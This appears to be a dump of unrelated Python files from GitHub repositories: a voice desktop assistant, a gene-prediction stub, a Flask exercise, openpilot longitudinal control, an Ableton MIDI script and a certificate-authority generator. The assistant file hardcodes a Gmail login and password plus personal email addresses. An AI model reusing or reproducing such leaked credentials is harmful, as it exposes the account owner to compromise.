] | permissive | Shashank-Dwivedi/DesktopAssistant | 4d556f53c167754401b9e936b1447e7bd74ce53a | 1d5fda08fb875fee8502553de3bed86f0df087d4 | refs/heads/master | 2022-04-01T07:36:10.824900 | 2020-01-05T12:11:02 | 2020-01-05T12:11:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,661 | py | import pyttsx3
import os
import speech_recognition as sr
import datetime
import wikipedia
import webbrowser
import smtplib
import googlesearch
import bs4 as bs
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
def speak(audio):
engine.say(audio)
engine.runAndWait()
def wishMe():
hour = int(datetime.datetime.now().hour)
if hour>=0 and hour<12:
speak("Good Morning Ashish")
elif hour>=12 and hour<18:
speak("Good Evening Ashish")
else:
speak("Good Afternoon Ashish")
speak("I am vision and this is my partner natasha. Please tell how may we help you?")
def takeCommand():
r = sr.Recognizer()
with sr.Microphone() as source:
print("Listening...")
r.pausethreshhold = 1
audio = r.listen(source)
try:
print("Recognising....")
query = r.recognize_google(audio, language='en-in')
print(f"You said: {query}\n")
except Exception as e:
print(e)
print("Say that again please...")
return "None"
return query
def sendEmail(to, content):
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login('anujashish16024@gmail.com', 'ay11rm11')
server.sendmail('anujashish16024@gmail.com', to, content)
server.close()
if __name__ == "__main__":
wishMe()
while True:
query = takeCommand().lower()
if 'vision' in query:
engine.setProperty('voice', voices[0].id)
if 'in wikipedia' in query:
speak("Searching Wikipedia...")
query = query.replace("wikipedia", "")
query=query.replace('vision search', '')
query=query.replace('in',"")
Results = wikipedia.summary(query, sentences=1)
speak("According to Wikipedia ")
print(Results)
speak(Results)
elif 'open youtube' in query:
webbrowser.open("youtube.com")
elif 'open google' in query:
webbrowser.open("google.com")
elif 'open stackoverflow' in query:
webbrowser.open("stackoverflow.com")
elif 'open my website' in query:
webbrowser.open("ashtheaibot.000webhostapp.com")
elif 'play music' in query:
music_dir = 'D:\\Music'
songs = os.listdir(music_dir)
print(songs)
os.startfile(os.path.join(music_dir, songs[0]))
elif 'the time' in query:
strTime = datetime.datetime.now().strftime("%H:%M:%S")
print(f"The time Sir is {strTime}")
speak(f"The time Sir is {strTime}")
elif 'open vs code' in query:
codePath = "C:\\Users\\Ashish Yadav\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
os.startfile(codePath)
elif 'open chrome' in query:
charmPath = "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
os.startfile(charmPath)
elif 'play movie' in query:
moviePath = "D:\\Chak De India 2007 Hindi Www.MoviesBay.in 480p BluRay 450MB.mkv"
os.startfile(moviePath)
elif 'play fifa' in query:
gamePath = "D:\\FIFA 2K18\\FIFA18.exe"
os.startfile(gamePath)
elif 'mail to daddy' in query:
try:
speak('what should i say?')
content = takeCommand()
to = "asy732144@gmail.com"
sendEmail(to, content)
speak('email has been sent')
except Exception as e:
print(e)
speak("Something went wrong, so sorry")
elif 'mail to bhaiya' in query:
try:
speak('what should i say?')
content = takeCommand()
to = "ashutoshy.and01@gmail.com"
sendEmail(to, content)
speak('email has been sent')
except Exception as e:
print(e)
speak("Something went wrong, so sorry")
elif 'tell me about you' in query:
speak('My name as you know is Vision. I am an android with the mind of JARVIS the personnal AI of tony stark, i had a vibranium body made from Ultron currently in posession of the U S government')
elif 'quit' in query:
speak("Goodbye Sir!!")
exit()
elif 'natasha' in query:
engine.setProperty('voice', voices[1].id)
if 'in wikipedia' in query:
speak("Searching Wikipedia...")
query = query.replace("wikipedia", "")
query=query.replace('natasha search', '')
query=query.replace('in',"")
Results = wikipedia.summary(query, sentences=1)
speak("According to Wikipedia ")
print(Results)
speak(Results)
elif 'open youtube' in query:
webbrowser.open("youtube.com")
elif 'open google' in query:
webbrowser.open("google.com")
elif 'open stackoverflow' in query:
webbrowser.open("stackoverflow.com")
elif 'open my website' in query:
speak("Uhhhh...I don't have the permission to access that site. Do you want me to call vision for this Sir?")
webcom = takeCommand()
if 'yes' in webcom:
engine.setProperty('voice', voices[0].id)
speak("I presume its your website that natasha needs help with!, here it is")
webbrowser.open('ashtheaibot.000webhostapp.com')
speak('Natasha I am done')
engine.setProperty('voice', voices[1].id)
speak('Thanks for the help')
elif 'play music' in query:
music_dir = 'D:\\Music'
songs = os.listdir(music_dir)
print(songs)
os.startfile(os.path.join(music_dir, songs[0]))
elif 'the time' in query:
strTime = datetime.datetime.now().strftime("%H:%M:%S")
print(f"The time Sir is {strTime}")
speak(f"The time Sir is {strTime}")
elif 'open vs code' in query:
codePath = "C:\\Users\\Ashish Yadav\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
os.startfile(codePath)
elif 'open chrome' in query:
charmPath = "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
os.startfile(charmPath)
elif 'play movie' in query:
moviePath = "D:\\Chak De India 2007 Hindi Www.MoviesBay.in 480p BluRay 450MB.mkv"
os.startfile(moviePath)
elif 'play fifa' in query:
gamePath = "D:\\FIFA 2K18\\FIFA18.exe"
os.startfile(gamePath)
elif 'mail to daddy' in query:
try:
speak('what should i say?')
content = takeCommand()
to = "asy732144@gmail.com"
sendEmail(to, content)
speak('email has been sent')
except Exception as e:
print(e)
speak("Something went wrong, so sorry")
elif 'mail to bhaiya' in query:
try:
speak('what should i say?')
content = takeCommand()
to = "ashutoshy.and01@gmail.com"
sendEmail(to, content)
speak('email has been sent')
except Exception as e:
print(e)
speak("Something went wrong, so sorry")
elif 'tell me about you' in query:
speak('My name as you know is Natasha. I am a natural language user interface build by Aashish Yaaadav. Right i am only trained to do basic stuffs only.....but hey i evolve.')
elif 'quit' in query:
speak('Goodbye Sir!!')
exit() | [
"noreply@github.com"
] | noreply@github.com |
3101d3bd1babaa72f3a22d83e64963717d3eab67 | 09fee6ebdb0fdbac89bd84087c794d0ce57cd67e | /gpred.py | d2081c69bf83f3c4a1e18e5cdb5565314cee3de0 | [] | no_license | clementdesir/rattrapage_ohmique | f7308df12a6db8134425165f003abf3354c4969e | 7ef46083839a1e9056deb7a1318afc709687c7ff | refs/heads/main | 2023-08-10T20:03:07.509907 | 2021-09-29T02:24:39 | 2021-09-29T02:24:39 | 410,873,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,644 | py | import argparse
import sys
import os
import csv
import re
def isfile(path):
"""Check if path is an existing file.
:Parameters:
path: Path to the file
"""
if not os.path.isfile(path):
if os.path.isdir(path):
msg = "{0} is a directory".format(path)
else:
msg = "{0} does not exist.".format(path)
raise argparse.ArgumentTypeError(msg)
return path
def isdir(path):
"""Check if path is an existing file.
:Parameters:
path: Path to the file
"""
if not os.path.isdir(path):
if os.path.isfile(path):
msg = "{0} is a file".format(path)
else:
msg = "{0} does not exist.".format(path)
raise argparse.ArgumentTypeError(msg)
return path
def get_arguments():
"""Retrieves the arguments of the program.
Returns: An object that contains the arguments
"""
# Parsing arguments
parser = argparse.ArgumentParser(description=__doc__, usage=
"{0} -h"
.format(sys.argv[0]))
parser.add_argument('-i', dest='genome_file', type=isfile, required=True,
help="Complete genome file in fasta format")
parser.add_argument('-g', dest='min_gene_len', type=int,
default=50, help="Minimum gene length to consider")
parser.add_argument('-s', dest='max_shine_dalgarno_distance', type=int,
default=16, help="Maximum distance from start codon "
"where to look for a Shine-Dalgarno motif")
parser.add_argument('-d', dest='min_gap', type=int, default=40,
help="Minimum gap between two genes (shine box not included).")
parser.add_argument('-p', dest='predicted_genes_file', type=str,
default=os.curdir + os.sep +"predict_genes.csv",
help="Tabular file giving position of predicted genes")
parser.add_argument('-o', dest='fasta_file', type=str,
default=os.curdir + os.sep + "genes.fna",
help="Fasta file giving sequence of predicted genes")
return parser.parse_args()
def read_fasta(fasta_file):
"""Extract the complete genome sequence as a single string
"""
#seqs = []
with open(fasta_file, "r") as file:
sequence = ''
for line in file:
if line.startswith('>'):
#seqs.append(sequence)
sequence = ''
else:
sequence += line.strip()
return sequence
pass
def find_start(start_regex, sequence, start, stop):
"""Find the start codon
"""
debut = sequence.find(start)
fin = sequence.find(stop)
if debut<fin and start_regex.search(sequence,[debut,[fin]]) is not None:
return int(start_regex.search(sequence,[debut,[fin]]))
else:
return None
pass
def find_stop(stop_regex, sequence, start):
"""Find the stop codon
"""
deb = sequence.find(start)
if stop_regex.search(sequence, [deb,[len(sequence) - 3]]).start():
return stop_regex.search(sequence, [deb, [len(sequence) - 3]]).start()
else:
return 'None'
pass
def has_shine_dalgarno(shine_regex, sequence, start, max_shine_dalgarno_distance):
"""Find a shine dalgarno motif before the start codon
"""
if shine_regex.search(sequence, [sequence.find(start) - 6 - max_shine_dalgarno_distance, [sequence.find(start) - 6]]).start():
return True
else:
return False
pass
def predict_genes(sequence, start_regex, stop_regex, shine_regex,
min_gene_len, max_shine_dalgarno_distance, min_gap):
"""Predict most probable genes
"""
pass
def write_genes_pos(predicted_genes_file, probable_genes):
"""Write list of gene positions
"""
try:
with open(predicted_genes_file, "wt") as predict_genes:
predict_genes_writer = csv.writer(predict_genes, delimiter=",")
predict_genes_writer.writerow(["Start", "Stop"])
predict_genes_writer.writerows(probable_genes)
except IOError:
sys.exit("Error cannot open {}".format(predicted_genes_file))
def fill(text, width=80):
"""Split text with a line return to respect fasta format"""
return os.linesep.join(text[i:i+width] for i in range(0, len(text), width))
def write_genes(fasta_file, sequence, probable_genes, sequence_rc, probable_genes_comp):
"""Write gene sequence in fasta format
"""
try:
with open(fasta_file, "wt") as fasta:
for i,gene_pos in enumerate(probable_genes):
fasta.write(">gene_{0}{1}{2}{1}".format(
i+1, os.linesep,
fill(sequence[gene_pos[0]-1:gene_pos[1]])))
i = i+1
for j,gene_pos in enumerate(probable_genes_comp):
fasta.write(">gene_{0}{1}{2}{1}".format(
i+1+j, os.linesep,
fill(sequence_rc[gene_pos[0]-1:gene_pos[1]])))
except IOError:
sys.exit("Error cannot open {}".format(fasta_file))
def reverse_complement(kmer):
"""Get the reverse complement"""
complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A'}
return ''.join([complement[base] for base in kmer[::-1]])
#==============================================================
# Main program
#==============================================================
def main():
"""
Main program function
"""
# Gene detection over genome involves to consider a thymine instead of
# an uracile that we would find on the expressed RNA
start_codons = ['TTG', 'CTG', 'ATT', 'ATG', 'GTG']
stop_codons = ['TAA', 'TAG', 'TGA']
start_regex = re.compile('AT[TG]|[ATCG]TG')
stop_regex = re.compile('TA[GA]|TGA')
# Shine AGGAGGUAA
#AGGA ou GGAGG
shine_regex = re.compile('A?G?GAGG|GGAG|GG.{1}GG')
# Arguments
args = get_arguments()
# Let us do magic in 5' to 3'
# Don't forget to uncomment !!!
# Call these function in the order that you want
sequence = read_fasta('genome.fasta')
for start in start_codons:
for stop in stop_codons:
print(find_start(start_regex,sequence,start,stop))
# We reverse and complement
sequence_rc = reverse_complement(sequence)
# Call to output functions
#write_genes_pos(args.predicted_genes_file, probable_genes)
#write_genes(args.fasta_file, sequence, probable_genes, sequence_rc, probable_genes_comp)
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | noreply@github.com |
19575b1564e0017c90cc3e4a7b8bb967467f57ae | 762b8087f92b6bce8bec6b6de229786ed8a2cfa0 | /web_flask/5-number_template.py | 5ee5311a636ac77efd7fca6003e4dee4cd3e5191 | [] | no_license | 821-N/AirBnB_clone_v2 | 41a871dc47ad28af5d3440bb456cf18f4886e4b0 | 61d8ef1930662937ab23a8783fc81bce5c6b69ef | refs/heads/master | 2020-12-08T04:11:10.185900 | 2020-01-23T04:48:15 | 2020-01-23T04:48:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 989 | py | #!/usr/bin/python3
"""
start flask
"""
from flask import Flask, render_template
app = Flask(__name__)
@app.route("/", strict_slashes=False)
def root():
""" test """
return "Hello HBNB!"
@app.route("/hbnb", strict_slashes=False)
def hbnb():
""" test """
return "HBNB"
@app.route("/c/<balls>", strict_slashes=False)
def c(balls):
""" display text """
return "C "+balls.replace("_", " ")
@app.route("/python/<text>", strict_slashes=False)
@app.route("/python/", strict_slashes=False)
def python(text="is cool"):
""" display text """
return "Python "+text.replace("_", " ")
@app.route("/number/<int:num>", strict_slashes=False)
def number(num):
""" n is a number """
return str(num)+" is a number"
@app.route("/number_template/<int:num>", strict_slashes=False)
def number_template(num):
""" n is a number """
return render_template("5-number.html", num=num)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000)
| [
"nathaniel.marofsky@gmail.com"
] | nathaniel.marofsky@gmail.com |
a096e4437abaa8b9a4ef88b8553396569b3095f9 | c009bb2981602e604dd115ffa621c48a4382a3d7 | /selfdrive/controls/lib/longcontrol.py | 4794e5eced0c95946db31da80af1fe330f460d3b | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | DS1SQM/OPKR_088_210814 | bc6de6a7ef5f56bc4e509b0c1ad9117508d5eb04 | 48dbc1aca8859bb6b8de3e74938ad4087d03a3fb | refs/heads/main | 2023-07-10T02:26:41.774093 | 2021-08-13T12:34:17 | 2021-08-13T12:34:17 | 395,825,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,049 | py | from cereal import car, log
from common.numpy_fast import clip, interp
from selfdrive.controls.lib.pid import LongPIDController
from selfdrive.controls.lib.drive_helpers import CONTROL_N
from selfdrive.modeld.constants import T_IDXS
from selfdrive.car.hyundai.values import CAR
from selfdrive.config import Conversions as CV
from common.params import Params
import common.log as trace1
import common.CTime1000 as tm
LongCtrlState = log.ControlsState.LongControlState
LongitudinalPlanSource = log.LongitudinalPlan.LongitudinalPlanSource
STOPPING_EGO_SPEED = 0.5
STOPPING_TARGET_SPEED_OFFSET = 0.01
STARTING_TARGET_SPEED = 0.5
BRAKE_THRESHOLD_TO_PID = 0.2
BRAKE_STOPPING_TARGET = 0.5 # apply at least this amount of brake to maintain the vehicle stationary
RATE = 100.0
DEFAULT_LONG_LAG = 0.15
def long_control_state_trans(active, long_control_state, v_ego, v_target, v_pid,
output_gb, brake_pressed, cruise_standstill, stop, gas_pressed, min_speed_can):
"""Update longitudinal control state machine"""
stopping_target_speed = min_speed_can + STOPPING_TARGET_SPEED_OFFSET
stopping_condition = stop or (v_ego < 2.0 and cruise_standstill) or \
(v_ego < STOPPING_EGO_SPEED and
((v_pid < stopping_target_speed and v_target < stopping_target_speed) or
brake_pressed))
starting_condition = v_target > STARTING_TARGET_SPEED and not cruise_standstill or gas_pressed
if not active:
long_control_state = LongCtrlState.off
else:
if long_control_state == LongCtrlState.off:
if active:
long_control_state = LongCtrlState.pid
elif long_control_state == LongCtrlState.pid:
if stopping_condition:
long_control_state = LongCtrlState.stopping
elif long_control_state == LongCtrlState.stopping:
if starting_condition:
long_control_state = LongCtrlState.starting
elif long_control_state == LongCtrlState.starting:
if stopping_condition:
long_control_state = LongCtrlState.stopping
elif output_gb >= -BRAKE_THRESHOLD_TO_PID:
long_control_state = LongCtrlState.pid
return long_control_state
class LongControl():
def __init__(self, CP, compute_gb, candidate):
self.long_control_state = LongCtrlState.off # initialized to off
self.pid = LongPIDController((CP.longitudinalTuning.kpBP, CP.longitudinalTuning.kpV),
(CP.longitudinalTuning.kiBP, CP.longitudinalTuning.kiV),
(CP.longitudinalTuning.kdBP, CP.longitudinalTuning.kdV),
(CP.longitudinalTuning.kfBP, CP.longitudinalTuning.kfV),
rate=RATE,
sat_limit=0.8,
convert=compute_gb)
self.v_pid = 0.0
self.last_output_gb = 0.0
self.long_stat = ""
self.long_plan_source = ""
self.candidate = candidate
self.long_log = Params().get_bool("LongLogDisplay")
self.vRel_prev = 0
self.decel_damping = 1.0
self.decel_damping2 = 1.0
self.damping_timer = 0
def reset(self, v_pid):
"""Reset PID controller and change setpoint"""
self.pid.reset()
self.v_pid = v_pid
def update(self, active, CS, CP, long_plan, radarState):
"""Update longitudinal control. This updates the state machine and runs a PID loop"""
# Interp control trajectory
# TODO estimate car specific lag, use .15s for now
if len(long_plan.speeds) == CONTROL_N:
v_target = interp(DEFAULT_LONG_LAG, T_IDXS[:CONTROL_N], long_plan.speeds)
v_target_future = long_plan.speeds[-1]
a_target = interp(DEFAULT_LONG_LAG, T_IDXS[:CONTROL_N], long_plan.accels)
else:
v_target = 0.0
v_target_future = 0.0
a_target = 0.0
# Actuation limits
gas_max = interp(CS.vEgo, CP.gasMaxBP, CP.gasMaxV)
brake_max = interp(CS.vEgo, CP.brakeMaxBP, CP.brakeMaxV)
# Update state machine
output_gb = self.last_output_gb
if radarState is None:
dRel = 200
vRel = 0
else:
dRel = radarState.leadOne.dRel
vRel = radarState.leadOne.vRel
if long_plan.hasLead:
stop = True if (dRel < 4.0 and radarState.leadOne.status) else False
else:
stop = False
self.long_control_state = long_control_state_trans(active, self.long_control_state, CS.vEgo,
v_target_future, self.v_pid, output_gb,
CS.brakePressed, CS.cruiseState.standstill, stop, CS.gasPressed, CP.minSpeedCan)
v_ego_pid = max(CS.vEgo, CP.minSpeedCan) # Without this we get jumps, CAN bus reports 0 when speed < 0.3
if (self.long_control_state == LongCtrlState.off or (CS.brakePressed or CS.gasPressed)) and self.candidate not in [CAR.NIRO_EV]:
self.v_pid = v_ego_pid
self.pid.reset()
output_gb = 0.
elif self.long_control_state == LongCtrlState.off or CS.gasPressed:
self.reset(v_ego_pid)
output_gb = 0.
# tracking objects and driving
elif self.long_control_state == LongCtrlState.pid:
self.v_pid = v_target
self.pid.pos_limit = gas_max
self.pid.neg_limit = - brake_max
# Toyota starts braking more when it thinks you want to stop
# Freeze the integrator so we don't accelerate to compensate, and don't allow positive acceleration
prevent_overshoot = not CP.stoppingControl and CS.vEgo < 1.5 and v_target_future < 0.7
deadzone = interp(v_ego_pid, CP.longitudinalTuning.deadzoneBP, CP.longitudinalTuning.deadzoneV)
# opkr
if self.vRel_prev != vRel and vRel <= 0 and CS.vEgo > 13. and self.damping_timer <= 0: # decel mitigation for a while
if (vRel - self.vRel_prev)*3.6 < -4:
self.damping_timer = 45
self.decel_damping2 = interp(abs((vRel - self.vRel_prev)*3.6), [0, 10], [1, 0.1])
self.vRel_prev = vRel
elif self.damping_timer > 0:
self.damping_timer -= 1
self.decel_damping = interp(self.damping_timer, [0, 45], [1, self.decel_damping2])
output_gb = self.pid.update(self.v_pid, v_ego_pid, speed=v_ego_pid, deadzone=deadzone, feedforward=a_target, freeze_integrator=prevent_overshoot)
output_gb *= self.decel_damping
if prevent_overshoot or CS.brakeHold:
output_gb = min(output_gb, 0.0)
# Intention is to stop, switch to a different brake control until we stop
elif self.long_control_state == LongCtrlState.stopping:
# Keep applying brakes until the car is stopped
factor = 1
if long_plan.hasLead:
factor = interp(dRel,[2.0,4.0,5.0,6.0,7.0,8.0], [2.0,1.0,0.7,0.5,0.3,0.0])
if not CS.standstill or output_gb > -BRAKE_STOPPING_TARGET:
output_gb -= CP.stoppingBrakeRate / RATE * factor
elif CS.cruiseState.standstill and output_gb < -BRAKE_STOPPING_TARGET:
output_gb += CP.stoppingBrakeRate / RATE
output_gb = clip(output_gb, -brake_max, gas_max)
self.reset(CS.vEgo)
# Intention is to move again, release brake fast before handing control to PID
elif self.long_control_state == LongCtrlState.starting:
factor = 1
if long_plan.hasLead:
factor = interp(dRel,[0.0,2.0,3.0,4.0,5.0], [0.0,0.5,1,250.0,500.0])
if output_gb < -0.2:
output_gb += CP.startingBrakeRate / RATE * factor
self.reset(CS.vEgo)
self.last_output_gb = output_gb
final_gas = clip(output_gb, 0., gas_max)
final_brake = -clip(output_gb, -brake_max, 0.)
if self.long_control_state == LongCtrlState.stopping:
self.long_stat = "STP"
elif self.long_control_state == LongCtrlState.starting:
self.long_stat = "STR"
elif self.long_control_state == LongCtrlState.pid:
self.long_stat = "PID"
elif self.long_control_state == LongCtrlState.off:
self.long_stat = "OFF"
else:
self.long_stat = "---"
if long_plan.longitudinalPlanSource == LongitudinalPlanSource.cruise:
self.long_plan_source = "cruise"
elif long_plan.longitudinalPlanSource == LongitudinalPlanSource.lead0:
self.long_plan_source = "lead0"
elif long_plan.longitudinalPlanSource == LongitudinalPlanSource.lead1:
self.long_plan_source = "lead1"
elif long_plan.longitudinalPlanSource == LongitudinalPlanSource.lead2:
self.long_plan_source = "lead2"
elif long_plan.longitudinalPlanSource == LongitudinalPlanSource.e2e:
self.long_plan_source = "e2e"
else:
self.long_plan_source = "---"
if CP.sccBus != 0 and self.long_log:
str_log3 = 'BUS={:1.0f}/{:1.0f} LS={:s} LP={:s} GS={:01.2f}/{:01.2f} BK={:01.2f}/{:01.2f} GB={:+04.2f} G={:1.0f} GS={} TG={:04.2f}/{:+04.2f}'.format(CP.mdpsBus, CP.sccBus, self.long_stat, self.long_plan_source, final_gas, gas_max, abs(final_brake), abs(brake_max), output_gb, CS.cruiseGapSet, int(CS.gasPressed), v_target, a_target)
trace1.printf2('{}'.format(str_log3))
return final_gas, final_brake, v_target, a_target
| [
""
] | |
c714879ab292decf242cb272a4d05560414fb170 | 72d010d00355fc977a291c29eb18aeb385b8a9b0 | /LV2_LX2_LC2_LD2/ParamMap.py | 12d64819be32886c056b2489f3ffb2779ffe3981 | [] | no_license | maratbakirov/AbletonLive10_MIDIRemoteScripts | bf0749c5c4cce8e83b23f14f671e52752702539d | ed1174d9959b20ed05fb099f0461bbc006bfbb79 | refs/heads/master | 2021-06-16T19:58:34.038163 | 2021-05-09T11:46:46 | 2021-05-09T11:46:46 | 203,174,328 | 0 | 0 | null | 2019-08-19T13:04:23 | 2019-08-19T13:04:22 | null | UTF-8 | Python | false | false | 2,876 | py | # Embedded file name: /Users/versonator/Jenkins/live/output/mac_64_static/Release/python-bundle/MIDI Remote Scripts/LV2_LX2_LC2_LD2/ParamMap.py
# Compiled at: 2018-04-23 20:27:04
from __future__ import absolute_import, print_function, unicode_literals
import Live
class Callable:
def __init__(self, anycallable):
self.__call__ = anycallable
class ParamMap:
u"""Class to help with device mapping"""
__module__ = __name__
def __init__(self, parent):
ParamMap.realinit(self, parent)
def realinit(self, parent):
self.parent = parent
self.params_with_listener = []
self.param_callbacks = []
def log(self, string):
self.parent.log(string)
def logfmt(self, fmt, *args):
args2 = []
for i in range(0, len(args)):
args2 += [args[i].__str__()]
str = fmt % tuple(args2)
return self.log(str)
def param_add_callback(self, script_handle, midi_map_handle, param, min, max, cc, channel):
callback = lambda : self.on_param_value_changed(param, min, max, cc, channel)
param.add_value_listener(callback)
self.params_with_listener += [param]
self.param_callbacks += [callback]
ParamMap.forward_cc(script_handle, midi_map_handle, channel, cc)
def receive_midi_note(self, channel, status, note_no, note_vel):
pass
def receive_midi_cc(self, chan, cc_no, cc_value):
pass
def forward_cc(script_handle, midi_map_handle, chan, cc):
Live.MidiMap.forward_midi_cc(script_handle, midi_map_handle, chan, cc)
forward_cc = Callable(forward_cc)
def forward_note(script_handle, midi_map_handle, chan, note):
Live.MidiMap.forward_midi_note(script_handle, midi_map_handle, chan, note)
forward_note = Callable(forward_note)
def map_with_feedback(midi_map_handle, channel, cc, parameter, mode):
feedback_rule = Live.MidiMap.CCFeedbackRule()
feedback_rule.channel = channel
feedback_rule.cc_value_map = tuple()
feedback_rule.delay_in_ms = -1.0
feedback_rule.cc_no = cc
Live.MidiMap.map_midi_cc_with_feedback_map(midi_map_handle, parameter, channel, cc, mode, feedback_rule, False)
Live.MidiMap.send_feedback_for_parameter(midi_map_handle, parameter)
map_with_feedback = Callable(map_with_feedback)
def on_param_value_changed(self, param, min, max, cc, channel):
pass
def remove_mappings(self):
for i in range(0, len(self.params_with_listener)):
param = self.params_with_listener[i]
callback = self.param_callbacks[i]
try:
if param.value_has_listener(callback):
param.remove_value_listener(callback)
except:
continue
self.params_with_listener = []
self.param_callbacks = []
| [
"julien@julienbayle.net"
] | julien@julienbayle.net |
df8e1519382f5e846aedc96f25434bbeb9ebdd51 | db863a4ea4b8534c769fac892df3aa4362094b49 | /homeca/__main__.py | 466e116c2b4cf75f108a06eb37db71b6a200121d | [
"MIT"
] | permissive | ejsmit/homeca | f23cfbed422e65346ba5340bc250d8daba7b41fa | 2466f6b0a029d7b33627e9c62bb09d22f81f25f3 | refs/heads/master | 2020-03-20T23:56:25.966574 | 2018-06-19T09:37:55 | 2018-06-19T09:37:55 | 137,870,792 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,237 | py | #!/usr/bin/env python
import sys
import datetime
import os
import argparse
import ipaddress
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import hashes
from cryptography import x509
CA_CERT_PATH = "cacert"
CA_KEY = "ca.key.pem"
CA_CERT = "ca.cert.pem"
CA_CERT_CRT = "root_ca_cert.crt"
def load_root_ca(ca_name):
print("==> Loading Root CA")
if not os.path.exists(CA_CERT_PATH):
os.mkdir(CA_CERT_PATH)
# just check for key. For now assume cert exists if key does.
if not os.path.exists(CA_CERT_PATH+ '/' + CA_KEY):
print("==> not found - creating it")
key = create_rsa_key(CA_CERT_PATH + '/' + CA_KEY)
cert = create_root_ca_cert(
CA_CERT_PATH + '/' + CA_CERT,
key,
ca_name)
else:
with open(CA_CERT_PATH + '/' + CA_KEY, "rb") as key_file:
key = serialization.load_pem_private_key(
key_file.read(),
password=None,
backend=default_backend()
)
with open(CA_CERT_PATH + '/' + CA_CERT, "rb") as cert_file:
cert = x509.load_pem_x509_certificate(
cert_file.read(),
backend=default_backend()
)
print('... Issuer: ' + cert.issuer.get_attributes_for_oid(x509.OID_COMMON_NAME)[0].value)
return (cert,key)
def create_rsa_key(path):
print("... Creating private key")
key = rsa.generate_private_key(
public_exponent=65537,
key_size=4096,
backend=default_backend()
)
with open(path, "wb") as f:
f.write(key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption(),
))
return key
def create_root_ca_cert(path, key, name):
print("... Creating Root CA Certificate")
subject = issuer = x509.Name([
x509.NameAttribute(x509.oid.NameOID.COMMON_NAME, name),
])
cert = (
x509.CertificateBuilder()
.subject_name(subject)
.issuer_name(issuer)
.public_key(key.public_key())
.serial_number(x509.random_serial_number())
.not_valid_before(datetime.datetime.utcnow())
.not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=3650))
.add_extension(x509.BasicConstraints(ca=True, path_length=0), critical=True)
.add_extension(x509.KeyUsage(
digital_signature=True, content_commitment=False, key_encipherment=False,
data_encipherment=False, key_agreement=False, key_cert_sign=True,
crl_sign=False,encipher_only=False, decipher_only=False), critical=True)
.add_extension(x509.ExtendedKeyUsage(
[x509.oid.ExtendedKeyUsageOID.SERVER_AUTH, x509.oid.ExtendedKeyUsageOID.CLIENT_AUTH] ),
critical=True)
.sign(key, hashes.SHA256(), default_backend())
)
with open(path, "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
return cert
def create_server_certificates(domains, ips, issuer_cert, issuer_key):
print("==> Creating Server certificate")
if len(domains)>0:
cn = domains[0]
else:
cn=ips[0]
if os.path.exists(cn):
print("\nError: Directory for CN='%s' already exists" % cn )
return
os.mkdir(cn)
key_name = cn + '/' + cn + '.key.pem'
cert_name = cn + '/' + cn + '.cert.pem'
key = create_rsa_key(key_name)
print("... Creating server certificate")
print("... CN=%s" % cn)
subject = x509.Name([
x509.NameAttribute(x509.oid.NameOID.COMMON_NAME, cn),
])
servers = [x509.DNSName(name) for name in domains]
servers += [x509.IPAddress(ipaddress.ip_address(ip)) for ip in ips]
builder = (
x509.CertificateBuilder()
.subject_name(subject)
.issuer_name(issuer_cert.issuer)
.public_key(key.public_key())
.serial_number(x509.random_serial_number())
.not_valid_before(datetime.datetime.utcnow())
.not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=3650))
.add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
.add_extension(x509.KeyUsage(
digital_signature=True, content_commitment=False, key_encipherment=True,
data_encipherment=False, key_agreement=False, key_cert_sign=False,
crl_sign=False,encipher_only=False, decipher_only=False), critical=True)
.add_extension(x509.ExtendedKeyUsage(
[x509.oid.ExtendedKeyUsageOID.SERVER_AUTH] ),
critical=True)
.add_extension(x509.SubjectAlternativeName(servers), critical=False)
)
print("... Signing certificate")
cert = builder.sign(issuer_key, hashes.SHA256(), default_backend() )
with open(cert_name, "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
def main(args=None):
if args is None:
args = sys.argv[1:]
parser = argparse.ArgumentParser(description='Create x509 certificates for my home network.')
parser.add_argument('--name',
help='Issuer name for root ca certificate')
parser.add_argument('--domain',
help='comma separated list of domains')
parser.add_argument('--ip',
help='Comma separated list of ip addresses')
args = parser.parse_args()
if not args.domain and not args.ip:
parser.print_help()
exit(1)
ca_name = "Rassie Smit Root CA"
if args.name:
ca_name = args.name
domain_names = args.domain.split(',') if args.domain else []
ip_addresses = args.ip.split(',') if args.ip else []
# load root certs (or create it if it does not exist)
(ca_cert, ca_key) = load_root_ca(ca_name)
# now go and create certificate
create_server_certificates(domain_names, ip_addresses, ca_cert, ca_key)
if __name__ == "__main__":
main()
| [
"rassie@smit.org.uk"
] | rassie@smit.org.uk |
